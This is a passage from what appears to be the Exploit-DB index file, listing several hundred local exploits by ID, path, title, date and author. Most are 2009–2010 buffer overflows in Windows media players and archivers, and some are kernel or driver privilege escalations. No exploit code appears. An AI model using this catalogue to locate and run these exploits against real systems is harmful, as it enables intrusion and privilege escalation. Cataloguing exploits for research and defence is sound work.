+10577,exploits/windows/local/10577.pl,"PlayMeNow - '.M3U' Playlist Buffer Overflow (SEH)",2009-12-21,"ThE g0bL!N",local,windows, +10595,exploits/windows/local/10595.pl,"CoolPlayer 2.18 - M3U Playlist Buffer Overflow",2009-12-22,data$hack,local,windows, +10596,exploits/windows/local/10596.pl,"PlayMeNow - '.m3u' Universal XP Buffer Overflow (SEH)",2009-12-22,"ThE g0bL!N",local,windows, +10602,exploits/windows/local/10602.pl,"Easy RM to MP3 27.3.700 (Windows XP SP3) - Local Overflow",2009-12-22,d3b4g,local,windows, +10613,exploits/linux/local/10613.c,"Linux Kernel 2.6.18 < 2.6.18-20 - Local Privilege Escalation",2009-12-23,DigitALL,local,linux, +10618,exploits/windows/local/10618.py,"Adobe Reader / Acrobat - '.PDF' File Overflow",2009-12-23,"Ahmed Obied",local,windows, +10619,exploits/windows/local/10619.c,"Easy RM to MP3 27.3.700 (Windows XP SP2) - Local Buffer Overflow",2009-12-23,bibi-info,local,windows, +10620,exploits/windows/local/10620.py,"Easy RM to MP3 2.7.3.700 - Local Buffer Overflow",2009-12-23,dijital1,local,windows, +10628,exploits/windows/local/10628.pl,"CastRipper 2.50.70 (Windows XP SP3) - '.pls' Local Stack Buffer Overflow",2009-12-24,d3b4g,local,windows, +10642,exploits/windows/local/10642.rb,"Easy RM to MP3 2.7.3.700 - Local Overflow",2009-12-24,"John Babio",local,windows, +10646,exploits/windows/local/10646.c,"CastRipper (Windows XP SP2) - '.m3u' Local Stack Buffer Overflow",2009-12-24,bibi-info,local,windows, +10664,exploits/windows/local/10664.py,"ReGet Deluxe 5.2 (build 330) - Local Stack Overflow",2009-12-25,Encrypt3d.M!nd,local,windows, +14158,exploits/windows/local/14158.pl,"Mini-stream RM-MP3 Converter 3.1.2.1 - '.m3u' Local Buffer Overflow",2010-07-01,Madjix,local,windows, +10744,exploits/windows/local/10744.rb,"Media Jukebox 8.0.400 - Local Buffer Overflow (SEH) (Metasploit)",2009-12-27,dijital1,local,windows, +10745,exploits/windows/local/10745.c,"Mini-stream Ripper 3.0.1.1 - '.pls' Universal Local Buffer Overflow",2009-12-27,mr_me,local,windows, +10747,exploits/windows/local/10747.py,"Mini-stream Ripper (Windows XP SP2/SP3) - Local Overflow",2009-12-27,dijital1,local,windows, +10748,exploits/windows/local/10748.rb,"Mini-stream 3.0.1.1 - Local Buffer Overflow (Metasploit)",2009-12-27,dijital1,local,windows, +10759,exploits/windows/local/10759.pl,"M.J.M. Quick Player 1.2 - Local Stack Buffer Overflow",2009-12-28,corelanc0d3r,local,windows, +10782,exploits/windows/local/10782.pl,"Mini-stream Ripper 3.0.1.1 - '.pls' Universal Buffer Overflow (Perl)",2009-12-29,jacky,local,windows, +10786,exploits/windows/local/10786.py,"Soritong 1.0 - Universal Buffer Overflow (Python)",2009-12-29,jacky,local,windows, +10787,exploits/windows/local/10787.py,"Mini-stream Ripper 3.0.1.1 - '.pls' Universal Buffer Overflow (Python)",2009-12-29,jacky,local,windows, +10797,exploits/windows/local/10797.py,"Quick Player 1.2 - Unicode Buffer Overflow (1)",2009-12-30,mr_me,local,windows, +10827,exploits/windows/local/10827.rb,"DJ Studio Pro 5.1.6.5.2 - Local Overflow (SEH)",2009-12-30,"Sébastien Duquette",local,windows, +10920,exploits/windows/local/10920.cpp,"VirtualDJ Trial 6.0.6 'New Year Edition' - '.m3u' Local Overflow",2010-01-02,"fl0 fl0w",local,windows, +10936,exploits/windows/local/10936.c,"PlayMeNow (Windows XP SP2 French) - '.M3U' Playlist Buffer Overflow",2010-01-03,bibi-info,local,windows, +11010,exploits/windows/local/11010.rb,"PlayMeNow 7.3/7.4 - Local Buffer Overflow (Metasploit)",2010-01-06,blake,local,windows, +11029,exploits/multiple/local/11029.txt,"DirectAdmin 1.33.6 - Symlink Security Bypass",2010-01-06,alnjm33,local,multiple, +11046,exploits/windows/local/11046.py,"Quick Player 1.2 - Unicode Buffer Overflow (2)",2010-01-06,sinn3r,local,windows, +11079,exploits/windows/local/11079.rb,"Audiotran 1.4.1 (Windows XP SP2/SP3 English) - Local Buffer Overflow",2010-01-10,"Sébastien Duquette",local,windows, +11093,exploits/windows/local/11093.rb,"Soritong 1.0 - Universal Buffer Overflow (SEH) (Metasploit)",2010-01-10,fb1h2s,local,windows, +11109,exploits/windows/local/11109.rb,"Audiotran 1.4.1 - '.pls' Local Stack Overflow (Metasploit)",2010-01-11,dookie,local,windows, +11112,exploits/win_x86/local/11112.c,"HTMLDOC 1.9.x-r1629 (Windows x86) - '.html' Local Buffer Overflow",2010-01-11,"fl0 fl0w",local,win_x86, +11139,exploits/windows/local/11139.c,"Winamp 5.05 < 5.13 - '.ini' Local Stack Buffer Overflow (PoC)",2010-01-14,"fl0 fl0w",local,windows, +11146,exploits/windows/local/11146.py,"BS.Player 2.51 - Overwrite (SEH)",2010-01-15,"Mert SARICA",local,windows, +11152,exploits/windows/local/11152.py,"Google SketchUp 7.1.6087 - 'lib3ds' 3DS Importer Memory Corruption",2010-01-16,mr_me,local,windows, +11154,exploits/windows/local/11154.py,"BS.Player 2.51 - Universal Overflow (SEH)",2010-01-16,Dz_attacker,local,windows, +11161,exploits/windows/local/11161.pl,"Rosoft Media Player 4.4.4 - Local Buffer Overflow (SEH) (1)",2010-01-16,Red-D3v1L,local,windows, +11171,exploits/windows/local/11171.pl,"Audiotran 1.4.1 - Direct RET Buffer Overflow",2010-01-17,jacky,local,windows, +11174,exploits/windows/local/11174.c,"VideoLAN VLC Media Player 0.8.6 a/b/c/d (Win32 Universal) - '.ass' Local Buffer Overflow",2010-01-17,"fl0 fl0w",local,windows, +11191,exploits/windows/local/11191.pl,"Millenium MP3 Studio 1.x - '.m3u' Local Stack Overflow",2010-01-19,NeoCortex,local,windows, +11199,exploits/windows/local/11199.txt,"Microsoft Windows NT/2000/2003/2008/XP/Vista/7 - 'KiTrap0D' User Mode to Ring Escalation (MS10-015)",2010-01-19,"Tavis Ormandy",local,windows, +11202,exploits/windows/local/11202.pl,"RM Downloader - '.m3u' Local Buffer Overflow (SEH)",2010-01-19,jacky,local,windows, +11205,exploits/windows/local/11205.pl,"MP3 Studio 1.x - '.m3u' Local Stack Overflow (Universal)",2010-01-20,"D3V!L FUCKER",local,windows, +11208,exploits/windows/local/11208.pl,"jetAudio 8.0.0.2 Basic - '.m3u' Local Stack Overflow",2010-01-21,cr4wl3r,local,windows, +11219,exploits/windows/local/11219.pl,"SOMPL Player 1.0 - Local Buffer Overflow",2010-01-22,Rick2600,local,windows, +11229,exploits/windows/local/11229.txt,"Microsoft Internet Explorer - 'wshom.ocx' (Run) ActiveX Remote Code Execution (Add Admin)",2010-01-22,Stack,local,windows, +11232,exploits/windows/local/11232.c,"Authentium SafeCentral 2.6 - 'shdrv.sys' Local Kernel Ring0 SYSTEM",2010-01-22,mu-b,local,windows, +11255,exploits/windows/local/11255.pl,"Winamp 5.572 - 'whatsnew.txt' Local Stack Overflow",2010-01-25,Dz_attacker,local,windows, +11256,exploits/windows/local/11256.pl,"Winamp 5.572 (Windows XP SP3 DE) - 'whatsnew.txt' Local Buffer Overflow",2010-01-25,NeoCortex,local,windows, +11264,exploits/windows/local/11264.rb,"South River Technologies WebDrive Service 9.02 build 2232 - Bad Security Descriptor Privilege Escalation",2010-01-26,Trancer,local,windows, +11267,exploits/windows/local/11267.py,"Winamp 5.572 - Local Overflow (SEH)",2010-01-26,TecR0c,local,windows, +11281,exploits/windows/local/11281.c,"Rising AntiVirus 2008/2009/2010 - Local Privilege Escalation",2010-01-28,Dlrow,local,windows, +11314,exploits/windows/local/11314.py,"CoreFTP 2.1 b1637 - Password field Universal Buffer Overflow",2010-02-02,mr_me,local,windows, +11315,exploits/windows/local/11315.c,"DeepBurner pro 1.9.0.228 - '.dbr' file Buffer Overflow (Universal)",2010-02-02,"fl0 fl0w",local,windows, +11317,exploits/windows/local/11317.c,"Qihoo 360 Security Guard 6.1.5.1009 - breg device drivers Privilege Escalation",2010-02-02,anonymous,local,windows, +11331,exploits/windows/local/11331.txt,"Ipswitch IMAIL 11.01 - Reversible Encryption + weak ACL",2010-02-04,sinn3r,local,windows, +11333,exploits/windows/local/11333.pl,"FoxPlayer 1.7.0 - '.m3u' Local Buffer Overflow",2010-02-05,cr4wl3r,local,windows, +11364,exploits/multiple/local/11364.txt,"LDAP - Injection (PoC)",2010-02-09,mc2_s3lector,local,multiple, +11372,exploits/windows/local/11372.c,"UltraISO 9.3.6.2750 - Local Buffer Overflow",2010-02-09,"fl0 fl0w",local,windows, +11379,exploits/windows/local/11379.c,"feedDemon 3.1.0.9 - '.opml' File Buffer Overflow",2010-02-09,"fl0 fl0w",local,windows, +11384,exploits/windows/local/11384.py,"WM Downloader 3.0.0.9 (Windows XP SP3) - PLS PLA",2010-02-10,"Beenu Arora",local,windows, +11400,exploits/windows/local/11400.py,"RadASM 2.2.1.6 - '.rap' Universal Buffer Overflow",2010-02-11,Dz_attacker,local,windows, +11408,exploits/win_x86/local/11408.c,"RadASM - '.rap' file Local Buffer Overflow",2010-02-11,"fl0 fl0w",local,win_x86, +11413,exploits/windows/local/11413.pl,"CastRipper 2.50.70 - '.asx' Playlist Stack Overflow",2010-02-12,"Jordi Chancel",local,windows, +11465,exploits/windows/local/11465.py,"Ollydbg 2.00 Beta1 - Local Buffer Overflow",2010-02-15,_SuBz3r0_,local,windows, +11475,exploits/windows/local/11475.txt,"OtsTurntables Free 1.00.047 - '.olf' Universal Buffer Overflow",2010-02-16,mr_me,local,windows, +11491,exploits/multiple/local/11491.rb,"Apple iTunes 9.0.1 - '.pls' Handling Buffer Overflow",2010-02-17,"S2 Crew",local,multiple, +11561,exploits/multiple/local/11561.html,"Mozilla Firefox 3.6 - URL Spoofing",2010-02-24,anonymous,local,multiple, +11573,exploits/windows/local/11573.c,"Mediacoder 0.7.3.4605 - Local Buffer Overflow",2010-02-24,"fl0 fl0w",local,windows, +11581,exploits/windows/local/11581.py,"Orbital Viewer 1.04 - '.orb' File Local Universal Overflow (SEH)",2010-02-26,mr_me,local,windows, +11647,exploits/windows/local/11647.pl,"Yahoo Player 1.0 - '.m3u' / '.pls' / '.ypl' Local Buffer Overflow (SEH)",2010-03-07,Mr.tro0oqy,local,windows, +11651,exploits/multiple/local/11651.sh,"(Tod Miller's) Sudo/SudoEdit 1.6.9p21/1.7.2p4 - Local Privilege Escalation",2010-03-07,kingcope,local,multiple, +11656,exploits/windows/local/11656.py,"QuickZip 4.x - '.zip' Local Universal Buffer Overflow (PoC)",2010-03-08,"corelanc0d3r & mr_me",local,windows, +11663,exploits/windows/local/11663.txt,"Lenovo Hotkey Driver 5.33 - Local Privilege Escalation",2010-03-09,"Chilik Tamir",local,windows, +14092,exploits/windows/local/14092.c,"Kingsoft Writer 2010 - Local Stack Buffer Overflow",2010-06-28,"fl0 fl0w",local,windows, +11682,exploits/windows/local/11682.py,"Mini-stream Ripper 3.0.1.1 - '.m3u' HREF Buffer Overflow",2010-03-10,l3D,local,windows, +11713,exploits/windows/local/11713.pl,"Yahoo Player 1.0 - '.m3u' Local Buffer Overflow",2010-03-13,Bombard,local,windows, +11764,exploits/windows/local/11764.pl,"QuickZip 4.60.019 (Windows XP SP3) - Local Stack Buffer Overflow",2010-03-15,corelanc0d3r,local,windows, +11779,exploits/windows/local/11779.pl,"Windisc 1.3 - Local Stack Buffer Overflow",2010-03-16,Rick2600,local,windows, +11786,exploits/windows/local/11786.txt,"Virtual PC Hypervisor - Memory Protection",2010-03-17,"Core Security",local,windows, +11787,exploits/windows/local/11787.py,"Adobe Reader PDF - LibTiff Integer Overflow Code Execution",2010-03-17,villy,local,windows, +11789,exploits/multiple/local/11789.c,"VariCAD 2010-2.05 EN - Local Buffer Overflow",2010-03-17,n00b,local,multiple, +11791,exploits/windows/local/11791.pl,"myMP3-Player 3.0 - '.m3u' Local Buffer Overflow (SEH)",2010-03-18,n3w7u,local,windows, +11794,exploits/windows/local/11794.c,"Mediacoder - '.lst' Local Buffer Overflow",2010-03-18,"fl0 fl0w",local,windows, +11797,exploits/windows/local/11797.py,"ZippHo 3.0.6 - '.zip' Local Stack Buffer Overflow (PoC)",2010-03-18,mr_me,local,windows, +11828,exploits/windows/local/11828.py,"Crimson Editor r3.70 - Overwrite (SEH) (PoC)",2010-03-21,mr_me,local,windows, +11834,exploits/windows/local/11834.py,"Kenward Zipper 1.4 - Local Stack Buffer Overflow (PoC)",2010-03-22,mr_me,local,windows, +11872,exploits/windows/local/11872.py,"KenWard's Zipper 1.400 - Local Buffer Overflow (2)",2010-03-25,sinn3r,local,windows, +11900,exploits/windows/local/11900.pl,"Mini-stream RM-MP3 Converter 3.0.0.7 - '.pls' Universal Stack Buffer Overflow",2010-03-27,mat,local,windows, +11909,exploits/windows/local/11909.txt,"Mini-stream Ripper 3.1.0.8 - Local Stack Overflow",2010-03-28,"Hazem mofeed",local,windows, +11911,exploits/windows/local/11911.py,"Stud_PE 2.6.05 - Local Stack Overflow (PoC)",2010-03-28,zha0,local,windows, +11944,exploits/windows/local/11944.pl,"ASX to MP3 Converter 3.0.0.100 - '.pls' Universal Stack Overflow",2010-03-28,mat,local,windows, +11953,exploits/windows/local/11953.py,"RM Downloader 3.0.2.1 - '.asx' Local Buffer Overflow (SEH)",2010-03-30,b0telh0,local,windows, +11957,exploits/windows/local/11957.py,"Shadow Stream Recorder 3.0.1.7 - '.asx' Local Buffer Overflow",2010-03-30,b0telh0,local,windows, +11958,exploits/windows/local/11958.py,"ASX to MP3 Converter 3.0.0.100 - Local Stack Overflow",2010-03-30,"Hazem mofeed",local,windows, +11976,exploits/windows/local/11976.php,"Free MP3 CD Ripper 2.6 - '.wav' Local Stack Buffer Overflow",2010-03-31,mr_me,local,windows, +11981,exploits/windows/local/11981.py,"WM Downloader 3.0.0.9 - '.asx' Local Buffer Overflow",2010-03-31,b0telh0,local,windows, +11987,exploits/windows/local/11987.txt,"Adobe Reader - Escape From '.PDF' Execute Embedded Executable",2010-03-31,"Didier Stevens",local,windows, +12008,exploits/windows/local/12008.pl,"TugZip 3.5 Archiver - '.ZIP' File Buffer Overflow",2010-04-01,Lincoln,local,windows, +12012,exploits/windows/local/12012.txt,"Free MP3 CD Ripper 2.6 - '.wav' Local Overflow",2010-04-02,"Richard leahy",local,windows, +12024,exploits/windows/local/12024.php,"Zip Unzip 6.0 - '.zip' Local Stack Buffer Overflow (PoC)",2010-04-03,mr_me,local,windows, +12035,exploits/windows/local/12035.pl,"ZipScan 2.2c - Local Overflow (SEH)",2010-04-03,"Lincoln & corelanc0d3r",local,windows, +12051,exploits/windows/local/12051.php,"PHP 6.0 Dev - 'str_transliterate()' Local Buffer Overflow",2010-04-04,"Yakir Wizman",local,windows, +12053,exploits/windows/local/12053.py,"ZipCentral - '.zip' File (SEH)",2010-04-04,TecR0c,local,windows, +12059,exploits/windows/local/12059.pl,"eZip Wizard 3.0 - '.zip' File (SEH)",2010-04-04,"Lincoln & corelanc0d3r",local,windows, +12090,exploits/freebsd/local/12090.txt,"McAfee Email Gateway (formerly IronMail) - Local Privilege Escalation",2010-04-06,"Nahuel Grisolia",local,freebsd, +12091,exploits/freebsd/local/12091.txt,"McAfee Email Gateway (formerly IronMail) - Internal Information Disclosure",2010-04-06,"Nahuel Grisolia",local,freebsd, +12103,exploits/multiple/local/12103.txt,"Local Glibc Shared Library (.so) 2.11.1 - Code Execution",2010-04-07,Rh0,local,multiple, +12130,exploits/linux/local/12130.py,"ReiserFS (Linux Kernel 2.6.34-rc3 / RedHat / Ubuntu 9.10) - 'xattr' Local Privilege Escalation",2010-04-09,"Jon Oberheide",local,linux, +12189,exploits/windows/local/12189.php,"PHP 6.0 Dev - 'str_transliterate()' Local Buffer Overflow (NX + ASLR Bypass)",2010-04-13,ryujin,local,windows, +12213,exploits/windows/local/12213.c,"Micropoint ProActive Denfense 'Mp110013.sys' 1.3.10123.0 - Local Privilege Escalation",2010-04-14,MJ0011,local,windows, +20109,exploits/windows/local/20109.rb,"Photodex ProShow Producer 5.0.3256 - load File Handling Buffer Overflow (Metasploit)",2012-07-27,Metasploit,local,windows, +12255,exploits/windows/local/12255.rb,"Winamp 5.572 - 'whatsnew.txt' (SEH) (Metasploit)",2010-04-16,blake,local,windows, +12261,exploits/windows/local/12261.rb,"Archive Searcher - '.zip' Local Stack Overflow",2010-04-16,Lincoln,local,windows, +12293,exploits/windows/local/12293.py,"TweakFS 1.0 - FSX Edition Stack Buffer Overflow",2010-04-19,corelanc0d3r,local,windows, +12326,exploits/windows/local/12326.py,"ZipGenius 6.3.1.2552 - 'zgtips.dll' Local Stack Buffer Overflow",2010-04-21,corelanc0d3r,local,windows, +12342,exploits/windows/local/12342.pl,"EDraw Flowchart ActiveX Control 2.3 - '.edd parsing' Remote Buffer Overflow (PoC)",2010-04-22,LiquidWorm,local,windows, +12368,exploits/windows/local/12368.pl,"ZipWrangler 1.20 - '.zip' File (SEH)",2010-04-24,"TecR0c & Sud0",local,windows, +12379,exploits/windows/local/12379.php,"Easyzip 2000 3.5 - '.zip' Local Stack Buffer Overflow (PoC)",2010-04-25,mr_me,local,windows, +12388,exploits/windows/local/12388.rb,"WM Downloader 3.0.0.9 - Local Buffer Overflow (Metasploit)",2010-04-25,blake,local,windows, +12403,exploits/windows/local/12403.py,"IDEAL Administration 2010 10.2 - Local Buffer Overflow",2010-04-26,Dr_IDE,local,windows, +12404,exploits/windows/local/12404.py,"IDEAL Migration 2009 4.5.1 - Local Buffer Overflow",2010-04-26,Dr_IDE,local,windows, +12406,exploits/windows/local/12406.py,"Avast! 4.7 - 'aavmker4.sys' Local Privilege Escalation",2010-04-27,ryujin,local,windows, +12469,exploits/windows/local/12469.rb,"Urgent Backup 3.20 / ABC Backup Pro 5.20 / ABC Backup 5.50 - '.zip' File (SEH)",2010-04-30,Lincoln,local,windows, +12497,exploits/windows/local/12497.c,"PhotoFiltre Studio X - '.tif' Local Buffer Overflow (PoC)",2010-05-04,"fl0 fl0w",local,windows, +12501,exploits/windows/local/12501.php,"Beyond Compare 3.0.13 b9599 - '.zip' Local Stack Buffer Overflow (PoC)",2010-05-04,mr_me,local,windows, +12516,exploits/windows/local/12516.py,"BaoFeng Storm - '.m3u' File Processing Buffer Overflow",2010-05-06,"Lufeng Li & Qingshan Li",local,windows, +12528,exploits/windows/local/12528.pl,"AVCON H323Call - Local Buffer Overflow",2010-05-07,"Dillon Beresford",local,windows, +12540,exploits/windows/local/12540.rb,"IDEAL Migration 4.5.1 - Local Buffer Overflow (Metasploit)",2010-05-08,blake,local,windows, +12621,exploits/windows/local/12621.pl,"Shellzip 3.0 Beta 3 - '.zip' Local Stack Buffer Overflow (PoC)",2010-05-16,sud0,local,windows, +12662,exploits/windows/local/12662.rb,"SyncBack Freeware 3.2.20.0 - Local Overflow (SEH)",2010-05-19,Lincoln,local,windows, +30093,exploits/linux/local/30093.txt,"Mutt 1.4.2 - Mutt_Gecos_Name Function Local Buffer Overflow",2007-05-28,raylai,local,linux, +12677,exploits/windows/local/12677.html,"Rumba FTP Client 'FTPSFtp.dll' 4.2.0.0 - 'OpenSession()' Local Buffer Overflow",2010-05-21,sinn3r,local,windows, +12710,exploits/windows/local/12710.c,"Kingsoft Webshield 'KAVSafe.sys' 2010.4.14.609 (2010.5.23) - Kernel Mode Privilege Escalation",2010-05-23,"Xuanyuan Smart",local,windows, +12803,exploits/windows/local/12803.html,"IP2location.dll 1.0.0.1 - Function 'Initialize()' Local Buffer Overflow",2010-05-30,sinn3r,local,windows, +12821,exploits/windows/local/12821.py,"Mediacoder 0.7.3.4672 - Local Overflow (SEH)",2010-05-31,Stoke,local,windows, +40335,exploits/windows/local/40335.txt,"ArcServe UDP 6.0.3792 Update 2 Build 516 - Unquoted Service Path Privilege Escalation",2016-09-05,sh4d0wman,local,windows, +15499,exploits/windows/local/15499.py,"Free WMA MP3 Converter 1.1 - Local Buffer Overflow (SEH)",2010-11-12,Dr_IDE,local,windows, +13756,exploits/windows/local/13756.py,"VUPlayer 2.49 - '.m3u' File Universal Buffer Overflow (DEP Bypass) (1)",2010-06-07,mr_me,local,windows, +13760,exploits/windows/local/13760.py,"Audio Converter 8.1 - Local Stack Buffer Overflow (PoC)",2010-06-07,sud0,local,windows, +13761,exploits/windows/local/13761.pl,"Easy CD-DA Recorder 2007 - Local Buffer Overflow (SEH)",2010-06-07,chap0,local,windows, +13763,exploits/windows/local/13763.pl,"Audio Converter 8.1 - Local Stack Buffer Overflow (PoC) ROP/WPM",2010-06-07,sud0,local,windows, +13767,exploits/windows/local/13767.c,"SureThing CD Labeler - '.m3u/.pls' Unicode Stack Overflow (PoC)",2010-06-08,mr_me,local,windows, +13768,exploits/php/local/13768.py,"Castripper 2.50.70 - '.pls' File Stack Buffer Overflow (DEP Bypass)",2010-06-08,mr_me,local,php, +13806,exploits/windows/local/13806.txt,"ActivePerl 5.8.8.817 - Local Buffer Overflow",2010-06-09,PoisonCode,local,windows, +13820,exploits/windows/local/13820.pl,"Power Tab Editor 1.7 (Build 80) - Local Buffer Overflow",2010-06-11,sud0,local,windows, +13895,exploits/windows/local/13895.py,"Rosoft Audio Converter 4.4.4 - Local Buffer Overflow",2010-06-16,blake,local,windows, +13905,exploits/windows/local/13905.py,"BlazeDVD 5.1 (Windows 7) - '.plf' File Stack Buffer Overflow (PoC) (ASLR + DEP Bypass)",2010-06-17,mr_me,local,windows, +13907,exploits/windows/local/13907.py,"Winamp 5.572 - Local Buffer Overflow (EIP + SEH) (DEP Bypass)",2010-06-17,TecR0c,local,windows, +13909,exploits/windows/local/13909.py,"Batch Audio Converter Lite Edition 1.0.0.0 - Local Stack Buffer Overflow (SEH)",2010-06-17,modpr0be,local,windows, +13940,exploits/windows/local/13940.pl,"Orbital Viewer 1.04 - '.ov' Local Universal Stack Overflow (SEH)",2010-06-19,Crazy_Hacker,local,windows, +13942,exploits/windows/local/13942.pl,"MoreAmp - '.maf' Local Stack Buffer Overflow (SEH)",2010-06-20,Madjix,local,windows, +13998,exploits/windows/local/13998.pl,"BlazeDVD 6.0 - '.plf' File Universal Buffer Overflow (SEH)",2010-06-23,Madjix,local,windows, +14002,exploits/freebsd/local/14002.c,"FreeBSD 8.0/7.3/7.2 - 'nfs_mount()' Local Privilege Escalation",2010-06-23,"Patroklos Argyroudis",local,freebsd, +14029,exploits/windows/local/14029.py,"NO-IP.com Dynamic DNS Update Client 2.2.1 - 'Request' Insecure Encoding Algorithm",2010-06-24,sinn3r,local,windows, +14044,exploits/windows/local/14044.pl,"WM Downloader 2.9.2 - Local Stack Buffer Overflow",2010-06-25,Madjix,local,windows, +14046,exploits/windows/local/14046.py,"FieldNotes 32 5.0 - Local Buffer Overflow (SEH)",2010-06-25,TecR0c,local,windows, +14068,exploits/windows/local/14068.py,"Winamp 5.572 (Windows 7) - Local Buffer Overflow (ASLR + DEP Bypass)",2010-06-26,Node,local,windows, +14077,exploits/windows/local/14077.rb,"BlazeDVD 6.0 - Local Buffer Overflow (Metasploit)",2010-06-27,blake,local,windows, +14081,exploits/windows/local/14081.pl,"RM Downloader 3.1.3 - Local Buffer Overflow (SEH)",2010-06-27,Madjix,local,windows, +14098,exploits/windows/local/14098.py,"GSM SIM Utility 5.15 - '.sms' File Local Buffer Overflow (SEH)",2010-06-28,chap0,local,windows, +14150,exploits/windows/local/14150.pl,"RM Downloader 3.1.3 (Windows 7) - Local ASLR + DEP Bypass (SEH)",2010-07-01,Node,local,windows, +14153,exploits/windows/local/14153.pl,"Mediacoder 0.7.3.4682 - Universal Buffer Overflow (SEH)",2010-07-01,Madjix,local,windows, +14191,exploits/windows/local/14191.pl,"ASX to MP3 Converter 3.1.2.1 - Local Buffer Overflow (SEH)",2010-07-03,Madjix,local,windows, +14215,exploits/windows/local/14215.txt,"SasCam 2.7 - ActiveX Head Buffer Overflow",2010-07-05,blake,local,windows, +14256,exploits/windows/local/14256.txt,"HP OpenView Network Node Manager (OV NNM) 7.53 - 'ovwebsnmpsrv.exe' Local Buffer Overflow (SEH)",2010-07-07,bitform,local,windows, +14258,exploits/windows/local/14258.py,"GSM SIM Utility 5.15 - Direct RET Overflow",2010-07-07,chap0,local,windows, +14339,exploits/linux/local/14339.sh,"Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (2)",2010-07-12,anonymous,local,linux, +14352,exploits/windows/local/14352.rb,"ASX to MP3 Converter 3.1.2.1 - Multiple OS ASLR + DEP Bypass (SEH) (Metasploit)",2010-07-13,Node,local,windows, +14361,exploits/windows/local/14361.py,"Microsoft Excel - 0x5D record Stack Overflow (MS10-038)",2010-07-14,webDEViL,local,windows, +14373,exploits/win_x86/local/14373.pl,"Mini-stream RM-MP3 Converter 3.1.2.1 - '.pls' Local Stack Buffer Overflow Universal",2010-07-16,Madjix,local,win_x86, +14397,exploits/windows/local/14397.rb,"MoreAmp - Local Buffer Overflow (SEH) (Metasploit)",2010-07-17,Madjix,local,windows, +14403,exploits/windows/local/14403.txt,"Microsoft Windows - Automatic .LNK Shortcut File Code Execution",2010-07-18,Ivanlef0u,local,windows, +14406,exploits/bsd/local/14406.pl,"Ghostscript - '.PostScript' File Stack Overflow",2010-07-18,"Rodrigo Rubira Branco",local,bsd, +14428,exploits/windows/local/14428.py,"QQPlayer - '.asx' File Processing Buffer Overflow",2010-07-21,"Li Qingshan",local,windows, +14431,exploits/windows/local/14431.py,"QQPlayer - '.cue' File Buffer Overflow",2010-07-21,"Lufeng Li",local,windows, +14433,exploits/windows/local/14433.pl,"ZipCentral - '.zip' Local Buffer Overflow (SEH)",2010-07-21,"Jiten Pathy",local,windows, +14464,exploits/windows/local/14464.pl,"Mediacoder 0.7.3.4682 - '.m3u' Universal Buffer Overflow",2010-07-24,s-dz,local,windows, +14482,exploits/windows/local/14482.py,"QQPlayer 2.3.696.400p1 - '.smi' File Buffer Overflow",2010-07-27,"Lufeng Li",local,windows, +14491,exploits/windows/local/14491.txt,"Zemana AntiLogger 'AntiLog32.sys' 1.5.2.755 - Local Privilege Escalation",2010-07-28,th_decoder,local,windows, +14497,exploits/windows/local/14497.py,"WM Downloader 3.1.2.2 2010.04.15 - Local Buffer Overflow (SEH)",2010-07-28,fdiskyou,local,windows, +14503,exploits/windows/local/14503.pl,"HTML Email Creator 2.42 build 718 - Local Buffer Overflow (SEH)",2010-07-29,Madjix,local,windows, +14527,exploits/windows/local/14527.pl,"WM Downloader 3.1.2.2 - Local Buffer Overflow (1)",2010-08-02,s-dz,local,windows, +14532,exploits/windows/local/14532.py,"Mini-stream RM-MP3 Converter/WMDownloader/ASX to MP3 Cnvrtr - Local Stack Buffer Overflow",2010-08-02,"Praveen Darshanam",local,windows, +14538,exploits/ios/local/14538.txt,"Apple iOS - '.pdf' Jailbreak",2010-08-03,jailbreakme,local,ios, +14550,exploits/windows/local/14550.py,"Easy RM to MP3 2.7.3.700 - '.m3u' / '.pls' / '.smi' / '.wpl' / '.wax' / '.wvx' / '.ram' Local Overflow",2010-08-04,"Oh Yaw Theng",local,windows, +14566,exploits/windows/local/14566.c,"Microsoft Windows - 'win32k.sys' Driver 'CreateDIBPalette()' Local Buffer Overflow",2010-08-06,Arkon,local,windows, +14576,exploits/windows/local/14576.c,"Mini-stream Ripper 3.1.2.1 - Local Buffer Overflow (DEP Bypass)",2010-08-07,"fl0 fl0w",local,windows, +14581,exploits/windows/local/14581.py,"myMP3-Player 3.0 - Local Buffer Overflow",2010-08-08,"Oh Yaw Theng",local,windows, +14591,exploits/windows/local/14591.py,"Fat Player 0.6b - '.WAV' File Processing Buffer Overflow (SEH)",2010-08-09,"Praveen Darshanam",local,windows, +14610,exploits/windows/local/14610.txt,"Microsoft Windows - Tracing Registry Key ACL Privilege Escalation",2010-08-10,"Cesar Cerrudo",local,windows, +14612,exploits/windows/local/14612.py,"Mediacoder 0.7.5.4710 - Local Buffer Overflow",2010-08-11,anonymous,local,windows, +14630,exploits/windows/local/14630.py,"Mediacoder 0.7.5.4710 - 'Universal' Local Buffer Overflow (SEH)",2010-08-12,Dr_IDE,local,windows, +14633,exploits/windows/local/14633.py,"Xion Player 1.0.125 - Local Stack Buffer Overflow",2010-08-13,corelanc0d3r,local,windows, +14676,exploits/windows/local/14676.pl,"A-PDF WAV to MP3 Converter 1.0.0 - '.m3u' Local Stack Buffer Overflow",2010-08-17,d4rk-h4ck3r,local,windows, +14651,exploits/windows/local/14651.py,"Rosoft Media Player 4.4.4 - Local Buffer Overflow (SEH) (2)",2010-08-15,dijital1,local,windows, +14663,exploits/windows/local/14663.py,"MUSE 4.9.0.006 - '.m3u' Local Buffer Overflow",2010-08-16,"Glafkos Charalambous",local,windows, +14664,exploits/windows/local/14664.py,"MUSE 4.9.0.006 - '.pls' Universal Local Buffer Overflow (SEH)",2010-08-16,"Glafkos Charalambous",local,windows, +14673,exploits/windows/local/14673.py,"Triologic Media Player 8 - '.m3u' Universal Unicode Local Buffer Overflow (SEH)",2010-08-17,"Glafkos Charalambous",local,windows, +14681,exploits/windows/local/14681.py,"A-PDF WAV to MP3 1.0.0 - Universal Local (SEH)",2010-08-18,Dr_IDE,local,windows, +14688,exploits/freebsd/local/14688.c,"FreeBSD - 'mbufs()' sendfile Cache Poisoning Privilege Escalation",2010-08-19,kingcope,local,freebsd, +14693,exploits/windows/local/14693.py,"Microsoft Word - Record Parsing Buffer Overflow (MS09-027)",2010-08-20,anonymous,local,windows, +14706,exploits/windows/local/14706.py,"Microsoft Excel - FEATHEADER Record (MS09-067)",2010-08-21,anonymous,local,windows, +14720,exploits/windows/local/14720.rb,"MicroP 0.1.1.1600 - 'mppl' Local Buffer Overflow",2010-08-23,"James Fitts",local,windows, +14721,exploits/windows/local/14721.c,"Wireshark 